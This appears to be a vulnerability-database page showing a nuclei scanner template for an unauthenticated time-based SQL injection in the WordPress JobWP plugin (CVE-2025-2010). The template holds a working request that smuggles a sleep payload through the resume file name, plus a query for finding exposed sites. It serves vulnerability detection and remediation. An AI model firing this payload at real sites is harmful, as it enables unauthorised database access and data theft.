Lucene search
K

WordPress JobWP Plugin <= 2.3.9 - SQL Injection

🗓️ 28 Jun 2026 03:02:45Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 19 Views

JobWP Plugin <= 2.3.9 is vulnerable to SQL Injection allowing attackers to access sensitive data.

Related
Refs
Code
id: CVE-2025-2010

info:
  name: WordPress JobWP Plugin <= 2.3.9 - SQL Injection
  author: iamnoooob,rootxharsh,pdresearch
  severity: critical
  description: |
    The JobWP - Job Board, Job Listing, Career Page and Recruitment Plugin plugin for WordPress is vulnerable to SQL Injection via the 'jobwp_upload_resume' parameter in all versions up to, and including, 2.3.9 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.
  impact: |
    Successful exploitation could allow an attacker to execute arbitrary SQL queries, potentially leading to data exfiltration, privilege escalation, or other malicious activities.
  remediation: |
    Update the JobWP Plugin to version later than 2.3.9. Alternatively, implement proper input validation and sanitization controls.
  reference:
    - https://wpscan.com/vulnerability/26713902-26d8-47e3-b651-fe30d9898270/
    - https://nvd.nist.gov/vuln/detail/CVE-2025-2010
  classification:
    epss-score: 0.01549
    epss-percentile: 0.71963
    cve-id: CVE-2025-2010
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cwe-id: CWE-89
  metadata:
    verified: true
    max-request: 1
    product: jobwp
    fofa-query: body="/wp-content/plugins/jobwp"
  tags: cve,cve2025,wp,wordpress,wp-plugin,sqli,jobwp,vuln

flow: http(1) && http(2)

variables:
  jobid: "{{jobid}}"

http:
  - raw:
      - |
        GET /jobs/{{jobid}}/ HTTP/1.1
        Host: {{Hostname}}

    extractors:
      - type: regex
        part: body
        name: nonce
        group: 1
        regex:
          - 'jobwp_apply_form_nonce_field" value="([a-z0-9]+)"'
        internal: true

  - raw:
      - |
        @timeout: 30s
        POST /jobs/{{jobid}}/ HTTP/1.1
        Host: {{Hostname}}
        Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryEUzdqU65JI5EA04B

        ------WebKitFormBoundaryEUzdqU65JI5EA04B
        Content-Disposition: form-data; name="jobwp_apply_form_nonce_field"

        {{nonce}}
        ------WebKitFormBoundaryEUzdqU65JI5EA04B
        Content-Disposition: form-data; name="x"

        /jobs/{{jobid}}/
        ------WebKitFormBoundaryEUzdqU65JI5EA04B
        Content-Disposition: form-data; name="jobwp_apply_for"

        x
        ------WebKitFormBoundaryEUzdqU65JI5EA04B
        Content-Disposition: form-data; name="jobwp_full_name"

        x
        ------WebKitFormBoundaryEUzdqU65JI5EA04B
        Content-Disposition: form-data; name="jobwp_email"

        [email protected]
        ------WebKitFormBoundaryEUzdqU65JI5EA04B
        Content-Disposition: form-data; name="jobwp_cover_letter"

        x
        ------WebKitFormBoundaryEUzdqU65JI5EA04B
        Content-Disposition: form-data; name="jobwp_upload_resume"; filename="xxxxxx\"*sleep(7)*\".pdf"
        Content-Type: application/pdf

        x
        ------WebKitFormBoundaryEUzdqU65JI5EA04B--

    matchers:
      - type: dsl
        dsl:
          - 'duration>=7'
          - "status_code == 200"
          - "contains_all(body, 'jobwp-', 'apply-')"
        condition: and
# digest: 490a00463044022010c170fb43bae3db4ea805e66019e83d3ffb72c05e277ab82e83cbf6cdce610c02205ff337e948b08f33aab6305290222f7c2e5cffc107af31fb4415eb81d4d67cca:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
7.3High risk
Vulners AI Score7.3
CVSS 3.17.5
EPSS0.01549
SSVC
19